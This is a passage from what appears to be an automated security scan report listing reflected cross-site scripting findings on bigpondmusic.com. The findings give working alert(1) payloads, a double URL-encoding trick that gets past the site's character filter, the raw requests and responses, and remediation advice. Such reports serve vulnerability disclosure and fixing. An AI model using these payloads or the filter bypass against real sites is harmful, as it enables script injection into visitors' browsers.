This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /charts/albums?16824"style%3d"x%3aexpression(alert(1))"37d26c23a91=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:11:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123343
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Top 40 Albums - Album Downlo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/albums?16824"style="x:expression(alert(1))"37d26c23a91=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fc2c'%3b6c0fae99ce1 was submitted in the REST URL parameter 1. This input was echoed as 1fc2c';6c0fae99ce1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /charts1fc2c'%3b6c0fae99ce1/albums/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87992
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177b6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f9f321415f was submitted in the REST URL parameter 1. This input was echoed as 177b6"><script>alert(1)</script>5f9f321415f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /charts177b6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f9f321415f/albums/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88103
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88635b62e46 was submitted in the REST URL parameter 2. This input was echoed as 62a47"><script>alert(1)</script>88635b62e46 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /charts/albums62a47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88635b62e46/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88031
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8348f'%3b400564b8ae0 was submitted in the REST URL parameter 2. This input was echoed as 8348f';400564b8ae0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /charts/albums8348f'%3b400564b8ae0/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88030
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.261. http://bigpondmusic.com/charts/albums/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/charts/albums/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8c3"style%3d"x%3aexpression(alert(1))"1802bb7a9d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec8c3"style="x:expression(alert(1))"1802bb7a9d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /charts/albums/?ec8c3"style%3d"x%3aexpression(alert(1))"1802bb7a9d7=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:48:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123564
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Top 40 Albums - Album Downlo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/albums/?ec8c3"style="x:expression(alert(1))"1802bb7a9d7=1" /> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70ac4"style%3d"x%3aexpression(alert(1))"4b25918fdd7 was submitted in the ref parameter. This input was echoed as 70ac4"style="x:expression(alert(1))"4b25918fdd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /charts/albums/?ref=Net-Head-Music-TopAlbums70ac4"style%3d"x%3aexpression(alert(1))"4b25918fdd7 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:11:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123698
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Top 40 Albums - Album Downlo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/albums/?ref=Net-Head-Music-TopAlbums70ac4"style="x:expression(alert(1))"4b25918fdd7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 614a1'%3bda62d6c1b94 was submitted in the REST URL parameter 1. This input was echoed as 614a1';da62d6c1b94 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /charts614a1'%3bda62d6c1b94/tracks HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:11:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87895
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e90e067888 was submitted in the REST URL parameter 1. This input was echoed as e7042"><script>alert(1)</script>3e90e067888 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /chartse7042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e90e067888/tracks HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:11:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88334
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34b88%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98dc59286da was submitted in the REST URL parameter 2. This input was echoed as 34b88"><script>alert(1)</script>98dc59286da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /charts/tracks34b88%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98dc59286da HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:12:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87939
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e7b9'%3b285e3f3024e was submitted in the REST URL parameter 2. This input was echoed as 7e7b9';285e3f3024e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /charts/tracks7e7b9'%3b285e3f3024e HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:12:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87920
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.267. http://bigpondmusic.com/charts/tracks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/charts/tracks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13646"style%3d"x%3aexpression(alert(1))"a896a2d810 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13646"style="x:expression(alert(1))"a896a2d810 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /charts/tracks?13646"style%3d"x%3aexpression(alert(1))"a896a2d810=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:11:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 154652
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Top 40 Music Tracks - MP3 Mu ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/tracks?13646"style="x:expression(alert(1))"a896a2d810=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c2f1'%3b71f868245f was submitted in the REST URL parameter 1. This input was echoed as 1c2f1';71f868245f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /charts1c2f1'%3b71f868245f/tracks/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87892
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94c03%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1728065d7a was submitted in the REST URL parameter 1. This input was echoed as 94c03"><script>alert(1)</script>a1728065d7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /charts94c03%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1728065d7a/tracks/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88525
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acaba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecde76afd208 was submitted in the REST URL parameter 2. This input was echoed as acaba"><script>alert(1)</script>cde76afd208 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /charts/tracksacaba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecde76afd208/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87998
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29e47'%3b93a1f67ddf was submitted in the REST URL parameter 2. This input was echoed as 29e47';93a1f67ddf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /charts/tracks29e47'%3b93a1f67ddf/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87884
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.272. http://bigpondmusic.com/charts/tracks/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/charts/tracks/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1386a"style%3d"x%3aexpression(alert(1))"a92dacae792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1386a"style="x:expression(alert(1))"a92dacae792 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /charts/tracks/?1386a"style%3d"x%3aexpression(alert(1))"a92dacae792=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
